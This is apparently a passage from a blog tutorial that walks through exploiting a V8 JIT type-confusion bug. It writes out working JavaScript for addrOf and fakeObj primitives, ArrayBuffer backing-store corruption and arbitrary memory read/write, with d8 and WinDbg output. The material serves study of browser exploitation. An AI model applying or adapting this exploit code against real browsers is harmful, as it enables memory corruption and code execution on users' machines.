        pNames[i] = 'p' + i;
    }

    // Create eval of our vuln function that will generate code during runtime
    eval(`
    function vuln(obj) {
      // Access Property inline of obj, forcing a CheckMap operation
      obj.inline;
      // Force a Map Transition via our side-effect
      this.Object.create(obj);
      // Trigger our type-confusion by accessing out-of-bound properties
      ${pNames.map((p) => `let ${p} = obj.${p};`).join('\n')}
      return [${pNames.join(', ')}];
    }
  `)

    // Create an array of negative values from -1 to -31 to be used
    // for our makeObj function
    let pValues = [];
    for (let i = 1; i < 32; i++) {
        pValues[i] = -i;
    }

    // JIT code to trigger vuln
    for (let i = 0; i < 10000; i++) {
        // Create Object and pass it to Vuln function
        let res = vuln(makeObj(pValues));
        // Look for overlapping properties in results
        for (let i = 1; i < res.length; i++) {
            // If i is not the same value, and res[i] is between -32 and 0, it overlaps
            if (i !== -res[i] && res[i] < 0 && res[i] > -32) {
                [p1, p2] = [i, -res[i]];
                return;
            }
        }
    }
    throw "[!] Failed to find overlapping properties";
}

function addrOf() {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      // Trigger our type-confusion by accessing an out-of-bound property
      // This will load p1 from our object thinking it's a Double, but instead
      // due to overlap, it will load p2 which is an Object
      return obj.p${p1}.x;
    }
  `);

    let obj = {z: 1234};
    let pValues = [];
    pValues[p1] = {x: 13.37};
    pValues[p2] = {y: obj};

    for (let i = 0; i < 10000; i++) {
        let res = vuln(makeObj(pValues));
        if (res != 13.37) {
            %DebugPrint(obj);
            return res;
        }
    }
    throw "[!] AddrOf Primitive Failed"
}

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);
let x = addrOf();
print("[+] Leaking Object Address...");
print(`[+] Object Address: ${x}`);

With that, we can now execute the updated script in d8, and should get output similar to the following:

C:\dev\v8\v8\out\x64.debug>d8 --allow-natives-syntax C:\Users\User\Desktop\poc.js
[+] Finding Overlapping Properties...
[+] Properties p6 and p7 overlap!
DebugPrint: 000001E72E81A369: [JS_OBJECT_TYPE] in OldSpace
 - map: 0x005245541631 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x00bfad784229 <Object map = 00000052455022F1>
 - elements: 0x0308c8602cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x0308c8602cf1 <FixedArray[0]> {
    #z: 1234 (data field 0)
 }
0000005245541631: [Map]
 - type: JS_OBJECT_TYPE
 - instance size: 32
 - inobject properties: 1
 - elements kind: HOLEY_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - stable_map
 - back pointer: 0x00524550c201 <Map(HOLEY_ELEMENTS)>
 - prototype_validity cell: 0x0379e0b82201 <Cell value= 1>
 - instance descriptors (own) #1: 0x01e72e80f339 <DescriptorArray[5]>
 - layout descriptor: 0000000000000000
 - prototype: 0x00bfad784229 <Object map = 00000052455022F1>
 - constructor: 0x00bfad784261 <JSFunction Object (sfi = 00000379E0B8ED51)>
 - dependent code: 0x0308c8602391 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>
 - construction counter: 0

[+] Leaking Object Address...
[+] Object Address: 1.033797443889e-311

As you can see, the addrOf function returned a double floating-point value! Now we need to convert this floating point to an actual address so we can validate its correctness.

To do that, we can use TypedArrays, which allow us to describe an array-like view of an underlying binary data buffer. Since the data returned to us is a double precision floating point value, we can use the Float64Array to store our double in binary format like so:

d8> let floatView = new Float64Array(1);
d8> floatView[0] = 1.033797443889e-311

Once done, we can convert our floatView buffer to a 64-bit unsigned integer via the BigUint64Array, which should give us the byte representation of our object’s address.

d8> let uint64View = new BigUint64Array(floatView.buffer);
d8> uint64View[0]
2092429321065n

From here, it’s as simple as using the toString function with base 16 to convert the bytes to hexadecimal, which should give us a valid address.

d8> uint64View[0].toString(16)
"1e72e81a369"

As shown, once we convert our bytes to hex, we see that the value leaked by our addrOf primitive matches our object’s address of 000001E72E81A369!

We now have a working addrOf read primitive!

From here, there is just one slight modification that needs to be made for our addrOf function. We have to make sure we subtract 1n from the BigUint64Array to account for pointer tagging if we want to use this address further in the script.
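The conversion in both directions can be sketched with two small helpers that share one 8-byte buffer. The names doubleToBits, bitsToDouble and untag are hypothetical and are not the helpers used in the rest of this post. The sketch clears the low tag bit rather than subtracting 1n, which gives the same result for a tagged pointer and leaves an already untagged value alone.

```javascript
// One 8-byte buffer viewed both as a double and as a 64-bit integer.
const buf = new ArrayBuffer(8);
const f64 = new Float64Array(buf);
const u64 = new BigUint64Array(buf);

// Reinterpret the bits of a double as an unsigned 64-bit BigInt.
function doubleToBits(d) {
  f64[0] = d;
  return u64[0];
}

// Reinterpret a 64-bit BigInt as a double (the reverse direction).
function bitsToDouble(bits) {
  u64[0] = bits;
  return f64[0];
}

// Clear the low tag bit of a tagged V8 pointer.
function untag(ptr) {
  return ptr & ~1n;
}

// Tagged address taken from the DebugPrint output above.
const tagged = 0x1e72e81a369n;
const asDouble = bitsToDouble(tagged);

console.log(asDouble);                            // a tiny denormal double
console.log(doubleToBits(asDouble).toString(16)); // 1e72e81a369
console.log(untag(tagged).toString(16));          // 1e72e81a368
```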

Our addrOf function with its conversion buffers will now look like so:

// Conversion Buffers
let floatView = new Float64Array(1);
let uint64View = new BigUint64Array(floatView.buffer);

Number.prototype.toBigInt = function toBigInt() {
    floatView[0] = this;
    return uint64View[0];
};

...

function addrOf() {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      // Trigger our type-confusion by accessing an out-of-bound property
      // This will load p1 from our object thinking it's a Double, but instead
      // due to overlap, it will load p2 which is an Object
      return obj.p${p1}.x;
    }
  `);

    let obj = {z: 1234};
    let pValues = [];
    pValues[p1] = {x: 13.37};
    pValues[p2] = {y: obj};

    for (let i = 0; i < 10000; i++) {
        let res = vuln(makeObj(pValues));
        if (res != 13.37) {
            // Subtract 1n from address due to pointer tagging.
            return res.toBigInt() - 1n;
        }
    }
    throw "[!] AddrOf Primitive Failed"
}

The fakeObj Write Primitive

The fakeObj primitive, short for “Fake Object”, allows us to write data to essentially a fake object by exploiting our constructed type confusion. In essence, the write primitive is just the inverse of our addrOf primitive.

To create the fakeObj function, we simply make a small modification to the original addrOf function. In our fakeObj function, we store the original value of our object in a variable called orig. After we overwrite it, we return the original value and compare it in the JIT function.

For testing, we try to overwrite the x property of p1 with the value 0x41414141n. Due to the type confusion, this will overwrite the y property of our object in p2 when the bug triggers in the JIT code. If we successfully corrupt the value and later return it via the orig variable, it should no longer equal 13.37.

The fakeObj function will look like so:

function fakeObj() {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      let orig = obj.p${p1}.x;
      // Overwrite property x of p1, but due to type confusion
      // we overwrite property y of p2
      obj.p${p1}.x = 0x41414141n;
      return orig;
    }
  `);

    let obj = {z: 1234};
    let pValues = [];
    pValues[p1] = {x: 13.37};
    pValues[p2] = {y: obj};

    for (let i = 0; i < 10000; i++) {
        let res = vuln(makeObj(pValues));
        if (res != 13.37) {
            return res;
        }
    }
}

After updating our code with the new fakeObj primitive, and executing it within d8, we should get output similar to the following:

C:\dev\v8\v8\out\x64.debug>d8 --allow-natives-syntax C:\Users\User\Desktop\poc.js
[+] Finding Overlapping Properties...
[+] Properties p6 and p30 overlap!
[+] Leaking Object Address...
[+] Object Address: 0x21eacf99a08
[+] Corrupting Object Address...
[+] Leaked Data: 1094795585

It seems that we got some data back, and it doesn’t equal 13.37!

This looks to be an unsigned integer, so we can use the uint64View array buffer to store the value and then convert the bytes to hex, like so.

d8> uint64View[0] = 1094795585n
d8> uint64View[0].toString(16)
'41414141'

And there we have it! We successfully overwrote the y property of p2 and successfully constructed a valid write primitive!

This is a very powerful primitive as it allows us to write to essentially any object property that we can find the address of. From here we can start to build out more complex exploit primitives to eventually achieve code execution.

Gaining Memory Read + Write

Now that we have created working read and write primitives from our bug, we can start to utilize these primitives to gain remote code execution within the interpreter. Currently we’ve only been able to overwrite the property of a second object with a controlled double. However, this isn’t useful for us by any means.

The reason is that even though we can overwrite an object address within a property, if we attempt to access that address to write data, V8 will still attempt to dereference it and access the backing store pointer at offset 8 from that address. This makes it difficult for us to read or write to any address of our choosing.

To achieve something useful with our read and write primitives, we need to overwrite an internal field of an object, such as the backing store pointer, rather than an actual object or property within the backing store. As you know, the backing store pointer stores a memory address that tells V8 where our property or element array is located. If we can overwrite this pointer, we can tell V8 to access specific elements anywhere in memory via our bug!

The next thing we have to consider for this exploit is to decide on what type of object we want to use when corrupting the backing store pointer. Sure, we can use a simple object with out-of-line properties, but in our case, and for most browser exploits, we’ll actually utilize an ArrayBuffer object.

The reason we use an ArrayBuffer over a normal object is because these array buffers are used to represent a fixed-length raw binary data buffer. One important thing to note is that we cannot directly manipulate the contents of an ArrayBuffer in JavaScript. Instead, we must use a TypedArray or a DataView object with a specific data representation format, and use that to read and write the contents of the buffer.

We’ve previously used a TypedArray in our addrOf primitive to return our object’s address as a double floating point and then converted it to an unsigned 64-bit integer, which allowed us to then convert that value to hex to see the actual address. We can apply the same principle here for our fakeObj primitive by specifying the type of data we want to work with, i.e. integers, floats, 64-bit integers, etc. This way we can easily read and write data of whatever type we want, without worrying too much about conversions or the type of values our properties are.

Before we move on any further, let’s take a look at what ArrayBuffer objects look like in memory so we can better understand how to exploit them.

To start, let’s create a new ArrayBuffer that will be 8 bytes in length and then assign that buffer an 8-bit unsigned view.

d8> var buffer = new ArrayBuffer(8)
d8> var view = new Uint8Array(buffer)

Now, let’s use our %DebugPrint command to examine our buffer object.

d8> %DebugPrint(buffer)
DebugPrint: 000002297C70D881: [JSArrayBuffer]
 - map: 0x03b586384371 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x032f41990b21 <Object map = 000003B5863843C1>
 - elements: 0x01d0a7902cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 00000286692101A0
 - byte_length: 8
 - neuterable
 - properties: 0x01d0a7902cf1 <FixedArray[0]> {}
 - embedder fields = {
    0000000000000000
    0000000000000000
 }

As you can see, an ArrayBuffer object is similar to other V8 objects, as it has a Map, a properties store, and an elements fixed array, as well as the fields needed for the array buffer itself, such as the byte length and its backing store. The backing store is the address where the TypedArray (in this case, the view variable) will read and write data to/from.

We can confirm the connection between the ArrayBuffer and the TypedArray by using the %DebugPrint function on the view variable.

d8> %DebugPrint(view)
DebugPrint: 000002297C70F791: [JSTypedArray]
 - map: 0x03b586382b11 <Map(UINT8_ELEMENTS)> [FastProperties]
 - prototype: 0x032f419879e1 <Object map = 000003B586382B61>
 - elements: 0x02297c70f7d9 <FixedUint8Array[8]> [UINT8_ELEMENTS]
 - embedder fields: 2
 - buffer: 0x02297c70d881 <ArrayBuffer map = 000003B586384371>
 - byte_offset: 0
 - byte_length: 8
 - length: 8
 - properties: 0x01d0a7902cf1 <FixedArray[0]> {}
 - elements: 0x02297c70f7d9 <FixedUint8Array[8]> {
         0-7: 0
 }
 - embedder fields = {
    0000000000000000
    0000000000000000
 }

As you can see, the TypedArray has a buffer property that points to our ArrayBuffer at address 0x02297c70d881. The TypedArray also inherits the byte length property from the parent ArrayBuffer so it knows how much data it can read and write with its specific data format.
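The same relationship can be checked from plain JavaScript, without any debugger. The snippet below is a minimal sketch (the variable name wide is my own) showing that the view only references the buffer, and that a second view with a wider element type sees the same 8 bytes as a single element.

```javascript
// A buffer and an 8-bit view over it, as in the d8 session above.
const buffer = new ArrayBuffer(8);
const view = new Uint8Array(buffer);

// The view does not own any data; it references the ArrayBuffer.
console.log(view.buffer === buffer);                        // true
console.log(view.byteOffset, view.byteLength, view.length); // 0 8 8

// A second view with a different element type shares the same bytes.
// "wide" is a hypothetical name used only for this illustration.
const wide = new BigUint64Array(buffer);
console.log(wide.byteLength, wide.length);                  // 8 1

// A write through one view is visible through the other.
view[0] = 0xff;
console.log(wide[0]);                                       // 255n
```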

To better understand the structure and backing store of the array buffer object, we can use WinDbg to inspect it.

0:005> dq 000002297C70D881-1 L6
00000229`7c70d880  000003b5`86384371 000001d0`a7902cf1
00000229`7c70d890  000001d0`a7902cf1 00000000`00000008
00000229`7c70d8a0  00000286`692101a0 00000000`00000002

Upon inspection, we can see that from the top left we have our Map, properties and elements array property store pointers, followed by the byte length, and finally the backing store pointer of address 00000286692101A0, which is at offset 32 from the start of the array buffer.
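To make the offsets explicit, here is a small sketch that labels the six quadwords from the dump above. The labels are just descriptive names following the order described in this post (they are not V8 identifiers), and the last quadword is left unidentified since we don’t need it.

```javascript
// Quadwords copied from the dq output above, in memory order.
const qwords = [
  0x000003b586384371n, 0x000001d0a7902cf1n,
  0x000001d0a7902cf1n, 0x0000000000000008n,
  0x00000286692101a0n, 0x0000000000000002n,
];
// Descriptive labels only (assumption: same order as described in the text).
const labels = ["map", "properties", "elements", "byte_length",
                "backing_store", "(not identified here)"];
const POINTER_SIZE = 8;

const layout = qwords.map((value, i) => ({
  label: labels[i],
  offset: i * POINTER_SIZE,
  value,
}));

for (const { label, offset, value } of layout) {
  console.log(`+${offset}`.padEnd(5), label.padEnd(24), "0x" + value.toString(16));
}

const backingStore = layout.find((f) => f.label === "backing_store");
console.log(backingStore.offset);                // 32
console.log(backingStore.offset / POINTER_SIZE); // 4 (index in a 64-bit view)

// Heap object pointers carry a tag in the low bit; the backing store does not.
console.log((layout[0].value & 1n) === 1n);      // true
console.log((backingStore.value & 1n) === 0n);   // true
```

The index of 4 is the reason a 64-bit view placed over this object reaches the backing store pointer at element 4.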

Before we look into the backing store buffer, let’s add some data to our buffer to better see the representation in memory. To write data to the ArrayBuffer we have to use our TypedArray via our view variable like so.

d8> view[0] = 65
d8> view[2] = 66

Now that’s done, let’s view this backing store in WinDbg. Take note that I do not subtract 1 from the pointer since, unlike other object backing stores, an ArrayBuffer backing store is a raw, untagged 64-bit pointer!

0:005> dq 00000286692101A0 L6
00000286`692101a0  00000000`00420041 dddddddd`fdfdfdfd
00000286`692101b0  00000000`dddddddd 8c003200`1f678a43
00000286`692101c0  00000286`69d34e50 00000286`69d40230

Upon inspection of this memory address, we notice that in the top left we have our 8 bytes of data that we allocated for our array buffer. From the right, in index 0 we have 0x41 which is 65 and in index 2 we have 0x42 which is 66.
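We can reproduce the same quadword in plain JavaScript. This is a minimal sketch that reads the 8 bytes back through a DataView with little-endian byte order requested explicitly, so the result does not depend on the host platform.

```javascript
// Same writes as in the d8 session above.
const buffer = new ArrayBuffer(8);
const view = new Uint8Array(buffer);
view[0] = 65; // 0x41
view[2] = 66; // 0x42

// Read all 8 bytes back as one little-endian 64-bit value,
// which is how WinDbg's dq command displays them on x64.
const qword = new DataView(buffer).getBigUint64(0, true);
console.log(qword.toString(16).padStart(16, "0")); // 0000000000420041
```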

As you can see, using an ArrayBuffer with a TypedArray of any data type allows us to control where we can read and write data as long as we can control the backing store pointer!

With that in mind, let’s figure out how we can access this backing store pointer via our fakeObj primitive in order to overwrite it. Currently for both the read and write primitive we create an object for p1 with one in-line property, and an object for p2 which also has one in-line property.

function fakeObj() {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      let orig = obj.p${p1}.x;
      // Overwrite property x of p1, but due to type confusion
      // we overwrite property y of p2
      obj.p${p1}.x = 0x41414141n;
      return orig;
    }
  `);

    let obj = {z: 1234};
    let pValues = [];
    pValues[p1] = {x: 13.37};
    pValues[p2] = {y: obj}
	...

In the vuln function we attempt to overwrite property x for our p1 object. This would dereference the object address for p1 and access offset 24, where our x property value is stored in-line. However, due to the type confusion, this operation will actually dereference the object address of p2 and access offset 24, where the y property value is stored in-line, which would allow us to overwrite the address of the obj object.

The example below is provided to help you visualize what this would look like in memory.

We know that the backing store pointer for our array buffer is at offset 32, meaning that if we create another in-line property such as x2, then we should be able to access and overwrite that backing store pointer via our fakeObj primitive!

An example is provided below to help visualize this process in memory.

This is great for us because it allows us to finally utilize our bug and our primitives to gain arbitrary memory read/write access. However, there is one slight problem. If we have to read or write from multiple memory locations, we’ll have to constantly trigger our bug and overwrite our array buffer’s backing store via the fakeObj primitive, which is tedious. As such, we need a better solution.

To minimize the number of times we have to use the fakeObj primitive to overwrite the backing store, we can use two array buffer objects instead of one! This way, we can corrupt the backing store pointer of our first array buffer and point it to our second array buffer object’s address.

Once that is completed, we can use a 64-bit TypedArray view of our first array buffer to write to its 5th element (index 4, i.e. view1[4], which sits at byte offset 32), which will overwrite the backing store pointer of the second array buffer. From there, we can use a TypedArray view of the second array buffer to read and write data to/from the pointed memory region!

By using these two array buffers together, we can create another exploit primitive that allows us to quickly read and write data of any type to any location within the V8 heap.

An example of what this would look like in memory can be seen below.

To make our fakeObj function more flexible, we will modify it to accept an object of our choice. We’ll also pass in a newValue parameter that specifies the data we want to write. We’ll then set that newValue parameter for the x property within the vuln function instead of having our hardcoded address of 0x41414141n.

function fakeObj(obj, newValue) {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      let orig = obj.p${p1}.x;
      obj.p${p1}.x = ${newValue};
      return orig;
    }
  `);

    let pValues = [];
    pValues[p1] = {x: 13.37};
    pValues[p2] = {y: obj};
	...

We will also modify the object within p1 to have two in-line properties, since we know that the second in-line property overlaps the backing store pointer. Additionally, we need to modify the vuln function to access the second inline property so we can write to the backing store pointer.

BigInt.prototype.toNumber = function toNumber() {
    uint64View[0] = this;
    return floatView[0];
};

function fakeObj(obj, newValue) {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      // Write to Backing Store Pointer via Property x2
      let orig = obj.p${p1}.x2;
      obj.p${p1}.x2 = ${newValue};
      return orig;
    }
  `);

    let pValues = [];
    // x2 Property Overlaps Backing Store Pointer for Array Buffer
    let o = {x1: 13.37, x2: 13.38};
    pValues[p1] = o;
    pValues[p2] = obj;
	...

Notice that for our overlapping p2 object, we set it directly to the passed in obj. The reason we do this is because we need to access offset 32 of that specific object, instead of passing the object in as a property.

To properly convert the address or data we are passing in, we will add a new conversion function called toNumber and call that against our newValue parameter. This function is necessary as we need to convert the address or data that we are passing in, to be that of a float. The reason for this is due to our constructed type confusion and the fact that p1 expects a float!

BigInt.prototype.toNumber = function toNumber() {
    uint64View[0] = this;
    return floatView[0];
};

function fakeObj(obj, newValue) {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      // Write to Backing Store Pointer via Property x2
      let orig = obj.p${p1}.x2;
      obj.p${p1}.x2 = ${newValue.toNumber()};
      return orig;
    }
  `);

    let pValues = [];
    // x2 Property Overlaps Backing Store Pointer for Array Buffer
    let o = {x1: 13.37, x2: 13.38};
    pValues[p1] = o;
    pValues[p2] = obj;
	...
}
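To see why this conversion is safe to embed in the eval string, here is a standalone sketch of the same idea. The names bitsToDouble and doubleToBits are my own and are not part of the exploit script. It reinterprets a 64-bit integer as a double, lets the template literal turn it into decimal text, and then confirms that parsing the text gives back the exact same bits.

```javascript
// One 8-byte buffer viewed both as a double and as an unsigned 64-bit integer.
const convBuf = new ArrayBuffer(8);
const f64 = new Float64Array(convBuf);
const u64 = new BigUint64Array(convBuf);

// Reinterpret the bits of a BigInt as a double (same idea as toNumber above).
function bitsToDouble(bits) {
  u64[0] = bits;
  return f64[0];
}

// Reinterpret the bits of a double as a BigInt (the inverse direction).
function doubleToBits(d) {
  f64[0] = d;
  return u64[0];
}

const asDouble = bitsToDouble(0x41414141n);

// A template literal embeds the double as decimal text, just like the eval
// string does. Parsing that text restores the same double.
const source = `${asDouble}`;
const reparsed = Number(source);

console.log(source);
console.log(doubleToBits(reparsed).toString(16)); // 41414141
```

One caveat with this approach: bit patterns that decode to NaN would not survive the trip through text. User-mode addresses like the ones in this post have their upper bits clear, so they decode to tiny ordinary doubles and are not affected.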

Now comes the important part, modifying our JIT loop to trigger the bug and overwrite our backing store pointer. Similar to our previous fakeObj loop there are only a few modifications we need to make.

First of all, take note from above that we set the p1 property to a newly created object called o with two in-line properties. The reason we are doing this is because during our JIT loop we will need to constantly set the 2nd in-line property attribute of o to force the JIT compiler to trigger a redundancy elimination on our Map. This will allow us to access the backing store pointer as a float. If we don’t do this, then the function will not work!

Second of all, within the JIT loop, we will no longer compare the result value to 13.37. Instead, we will compare it to the value of our second property. In this case, if the loop no longer returns 13.38, it means that we successfully triggered the bug and overwrote the backing store pointer!

The final version of the fakeObj primitive will look like so.

BigInt.prototype.toNumber = function toNumber() {
    uint64View[0] = this;
    return floatView[0];
};

function fakeObj(obj, newValue) {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      // Write to Backing Store Pointer via Property x2
      let orig = obj.p${p1}.x2;
      obj.p${p1}.x2 = ${newValue.toNumber()};
      return orig;
    }
  `);

    let pValues = [];
    // x2 Property Overlaps Backing Store Pointer for Array Buffer
    let o = {x1: 13.37,x2: 13.38};
    pValues[p1] = o;
    pValues[p2] = obj;

    for (let i = 0; i < 10000; i++) {
        // Force Map Check and Redundancy Elimination
        o.x2 = 13.38;
        let res = vuln(makeObj(pValues));
        if (res != 13.38) {
            return res.toBigInt();
        }
    }
    throw "[!] fakeObj Primitive Failed"
}

Now that we finished that, since we’ll be using an object with two in-line properties for our fakeObj primitive, let’s make the same modification for our addrOf primitive to stay consistent, like so.

function addrOf(obj) {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      // Trigger our type confusion by loading the first in-line property of p1.
      // V8 loads x1 thinking it's a Double, but due to the overlap it reads
      // property y of p2, which is an Object pointer.
      return obj.p${p1}.x1;
    }
  `);

    let pValues = [];
    // x1 Overlaps Property y of p2; x2 Keeps the Shape Consistent with fakeObj
    pValues[p1] = {x1: 13.37,x2: 13.38};
    pValues[p2] = {y: obj};

    for (let i = 0; i < 10000; i++) {
        let res = vuln(makeObj(pValues));
        if (res != 13.37) {
            // Subtract 1n from address due to pointer tagging.
            return res.toBigInt() - 1n;
        }
    }
    throw "[!] AddrOf Primitive Failed"
}

Now that we have modified our exploit script, we should be able to overwrite an array buffer backing store pointer. Let’s test this!

To start, we’ll modify our exploit code by creating a new array buffer with 1024 bytes of data. Afterwards, we’ll attempt to leak the address of our array buffer and overwrite the backing store pointer with 0x41414141.

Take note that I have added two %DebugPrint calls to validate that the addresses we are leaking do coincide with our actual array buffer object, and that we have successfully overwritten the array buffer’s backing store pointer.

The updated code at the end of the script should look similar to mine.

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);

// Create Array Buffer
let arrBuf1 = new ArrayBuffer(1024);

print("[+] Leaking ArrayBuffer Address...");
let arrBuf1fAddr = addrOf(arrBuf1);
print(`[+] ArrayBuffer Address: 0x${arrBuf1fAddr.toString(16)}`);
%DebugPrint(arrBuf1)

print("[+] Corrupting ArrayBuffer Backing Store Address...")
// Overwrite Backing Store Pointer with 0x41414141
let ret = fakeObj(arrBuf1, 0x41414141n);
print(`[+] Original Leaked Data: 0x${ret.toString(16)}`);
%DebugPrint(arrBuf1)

Upon executing our updated exploit script within d8, we get the following output.

C:\dev\v8\v8\out\x64.debug>d8 --allow-natives-syntax C:\Users\User\Desktop\poc.js
[+] Finding Overlapping Properties...
[+] Properties p15 and p11 overlap!
[+] Leaking ArrayBuffer Address...
[+] ArrayBuffer Address: 0x2a164919360
DebugPrint: 000002A164919361: [JSArrayBuffer] in OldSpace
 - map: 0x00f4b4a84371 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x0143f1990b21 <Object map = 000000F4B4A843C1>
 - elements: 0x029264b02cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 000001AEDA203210
 - byte_length: 1024
 - neuterable
 - properties: 0x029264b02cf1 <FixedArray[0]> {}
 - embedder fields = {
    0000000000000000
    0000000000000000
 }
...

[+] Corrupting ArrayBuffer Backing Store Address...
[+] Original Leaked Data: 0x1aeda203210
DebugPrint: 000002A164919361: [JSArrayBuffer] in OldSpace
 - map: 0x00f4b4a84371 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x0143f1990b21 <Object map = 000000F4B4A843C1>
 - elements: 0x029264b02cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 0000000041414141
 - byte_length: 1024
 - neuterable
 - properties: 0x029264b02cf1 <FixedArray[0]> {}
 - embedder fields = {
    0000000000000000
    0000000000000000
 }
...

As you can see, our exploit script now successfully leaks the address of the array buffer, and we can confirm that the addresses match within the debug output. We also see that the original leaked data, or ret, returns the original backing store address. Additionally, we see that we have successfully overwritten the backing store pointer with 0x41414141, as shown in the debug output!

With the ability to overwrite the backing store pointer, we can go ahead and continue writing our exploit by building out our memory read/write primitive via the two array buffers. To recap, we need to create two array buffers, leak the address of the second array buffer, and overwrite the backing store pointer of the first array buffer with the address of the second array buffer.

The code to accomplish this can be seen below.

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);

// Create Array Buffers
let arrBuf1 = new ArrayBuffer(1024);
let arrBuf2 = new ArrayBuffer(1024);

// Leak Address of arrBuf2
print("[+] Leaking ArrayBuffer Address...");
let arrBuf2fAddr = addrOf(arrBuf2);
print(`[+] ArrayBuffer Address: 0x${arrBuf2fAddr.toString(16)}`);

// Corrupt Backing Store Pointer of arrBuf1 with Address to arrBuf2
print("[+] Corrupting ArrayBuffer Backing Store Address...")
let originalArrBuf1BackingStore = fakeObj(arrBuf1, arrBuf2fAddr);

With this, the backing store pointer of arrBuf1 should now point to the arrBuf2 object. To validate this, we can create a TypedArray for our first array buffer and read index 4 (byte offset 32) as a 64-bit unsigned integer via the BigUint64Array. This should provide us with the backing store pointer of the second array buffer.

The updated code for that will look like so.

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);

// Create Array Buffers
let arrBuf1 = new ArrayBuffer(1024);
let arrBuf2 = new ArrayBuffer(1024);

// Leak Address of arrBuf2
print("[+] Leaking ArrayBuffer Address...");
let arrBuf2Addr = addrOf(arrBuf2);
print(`[+] ArrayBuffer Address: 0x${arrBuf2Addr.toString(16)}`);

// Corrupt Backing Store Pointer of arrBuf1 with Address to arrBuf2
print("[+] Corrupting ArrayBuffer Backing Store Address...")
let originalArrBuf1BackingStore = fakeObj(arrBuf1, arrBuf2Addr);

// Validate Overwrite of Backing Store via TypedArray
let view1 = new BigUint64Array(arrBuf1)
let originalArrBuf2BackingStore = view1[4]
print(`[+] ArrayBuffer Backing Store: 0x${originalArrBuf2BackingStore.toString(16)}`);
%DebugPrint(arrBuf2)

As you can see, at the end of the script to validate the overwrite, we use %DebugPrint on our arrBuf2 object to confirm that we have the correct backing store address.

Executing our code, we get the following output.

C:\dev\v8\v8\out\x64.debug>d8 --allow-natives-syntax C:\Users\User\Desktop\poc.js
[+] Finding Overlapping Properties...
[+] Properties p6 and p15 overlap!
[+] Leaking ArrayBuffer Address...
[+] ArrayBuffer Address: 0x7393e19360
[+] Corrupting ArrayBuffer Backing Store Address...
[+] ArrayBuffer Backing Store: 0x15b14db9f20
DebugPrint: 0000007393E19361: [JSArrayBuffer] in OldSpace
 - map: 0x00f8c4384371 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x0075a6d10b21 <Object map = 000000F8C43843C1>
 - elements: 0x00f30a102cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 0000015B14DB9F20
 - byte_length: 1024
 - neuterable
 - properties: 0x00f30a102cf1 <FixedArray[0]> {}
 - embedder fields = {
    0000000000000000
    0000000000000000
 }

And it works! As you can see in the output, we have successfully leaked the address of the second array buffer and read its backing store pointer, which all match. From here, we can continue building out our memory read and write primitives via our array buffers.

Since all addresses within this build of V8 are 64-bit, we’ll use the 64-bit unsigned integer typed array. An example of a read and write primitive built from the code above can be seen below.

let memory = {
	read64(addr) {
		view1[4] = addr;
		let view2 = new BigUint64Array(arrBuf2);
		return view2[0];
	},
	write64(addr, ptr) {
		view1[4] = addr;
		let view2 = new BigUint64Array(arrBuf2);
		view2[0] = ptr;
	}
};
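If the pointer chasing is hard to follow, the toy model below may help. It is only a simulation: a flat DataView stands in for process memory, ToyArrayBuffer is a made-up class, and the addresses are arbitrary. The only detail borrowed from the real layout is that the backing store pointer lives at offset 32. It shows why writing index 4 of the first buffer redirects every access made through the second.

```javascript
// Toy model only: a flat "heap" standing in for process memory.
const heap = new DataView(new ArrayBuffer(0x400));
const BACKING_STORE_OFFSET = 32n; // offset seen in the WinDbg dump earlier

// 64-bit little-endian load/store at a simulated address.
const load64 = (addr) => heap.getBigUint64(Number(addr), true);
const store64 = (addr, value) => heap.setBigUint64(Number(addr), value, true);

// Hypothetical stand-in for an array buffer object; only the backing
// store field matters for this illustration.
class ToyArrayBuffer {
  constructor(objectAddr, backingStoreAddr) {
    this.addr = objectAddr;
    store64(this.addr + BACKING_STORE_OFFSET, backingStoreAddr);
  }
  // Every element access goes through the *current* backing store field.
  get backingStore() { return load64(this.addr + BACKING_STORE_OFFSET); }
  get64(index) { return load64(this.backingStore + BigInt(index * 8)); }
  set64(index, value) { store64(this.backingStore + BigInt(index * 8), value); }
}

const buf1 = new ToyArrayBuffer(0x000n, 0x100n);
const buf2 = new ToyArrayBuffer(0x080n, 0x200n);

// Step 1 (done once via the bug in the real exploit):
// point buf1's backing store at the buf2 object itself.
store64(buf1.addr + BACKING_STORE_OFFSET, buf2.addr);

// Step 2: index 4 of buf1 (4 * 8 = 32) now aliases buf2's backing store pointer.
const toyMemory = {
  read64(addr) { buf1.set64(4, addr); return buf2.get64(0); },
  write64(addr, value) { buf1.set64(4, addr); buf2.set64(0, value); },
};

toyMemory.write64(0x300n, 0x41414141n);
console.log(toyMemory.read64(0x300n).toString(16)); // 41414141
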